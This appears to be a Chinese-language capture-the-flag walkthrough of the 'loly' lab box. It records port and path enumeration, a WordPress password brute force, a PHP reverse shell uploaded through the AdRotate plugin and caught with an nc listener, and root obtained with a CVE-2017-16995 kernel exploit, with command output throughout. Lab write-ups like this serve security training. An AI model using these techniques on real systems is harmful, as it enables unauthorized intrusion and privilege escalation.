主要知识点
- 路径枚举
- 内核漏洞提权
具体步骤
继续nmap一下先
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-01 07:12 CST
Nmap scan report for loly.lc (172.16.33.25)
Host is up (0.022s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.63 seconds
对于80端口枚举路径,貌似安装了wordpress,用nikto扫描也能得出一样的结论
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.16.33.25
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 194] [--> http://172.16.33.25/wordpress/]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
=============================================================== 拿出wpscan扫描一下先,顺便枚举一下潜在用户,发现了adrotate插件和用户loly
[+] adrotate
| Location: http://loly.lc/wordpress/wp-content/plugins/adrotate/
| Last Updated: 2024-10-28T17:19:00.000Z
| [!] The version is out of date, the latest version is 5.13.5
|
| Found By: Urls In Homepage (Passive Detection)
......
......
[i] User(s) Identified:
[+] loly
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
重新调用wpscan,加入字典进行密码爆破,成功,一个密码文件不行就多换几个试试,尽量不要用rockyou,太大了,山穷水尽的时候再考虑rockyou
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando
Trying loly / christian Time: 00:00:35
访问一下页面发现有显示上的问题,略作调查,应该先把loly.lc加入到/etc/hosts文件中后再登录
发现AdRotate可以上传文件,但是有类型限制
我们尝试一下新建一个reverse文件夹并将php-reverse-shell.php复制并修改,最后打包成一个reverse.zip后上传,上传成功
在settigns中发现了上传后文件的保存路径
在本地启动nc -nlvp 80后尝试访问http://loly.lc/wordpress/wp-content/banners/reverse/php-reverse-shell.php,发现reverse shell创建成功
└─$ sudo nc -nlvp 80
[sudo] password for kali:
listening on [any] 80 ...
connect to [10.8.0.204] from (UNKNOWN) [172.16.33.25] 37790
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
06:23:14 up 1 day, 23:18, 0 users, load average: 0.17, 0.13, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
用sudo -l和suid作为线索去试验,没有发现任何东西,但是在linpeas的结果中发现了,linux版本应该有漏洞,查询一下发现了https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.4.0-31-generic (buildd@lgw01-16) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2.1) ) #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016
Distributor ID: Ubuntu
Description: Ubuntu 16.04.1 LTS
Release: 16.04
Codename: xenial
下载下来编译后上传至remote server并执行,成功提权
www-data@ubuntu:/tmp$ ./cve-2017-16995
./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880035088a00
[*] Leaking sock struct from ffff8800351aaf00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff8800358f60c0
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff8800358f60c0
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/root.txt
cat /root/root.txt
____ ____ ____ ____
/ ___| _ _ _ __ / ___/ ___|| _ \
\___ \| | | | '_ \| | \___ \| |_) |
___) | |_| | | | | |___ ___) | _ <
|____/ \__,_|_| |_|\____|____/|_| \_\
Congratulations. I'm BigCityBoy
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
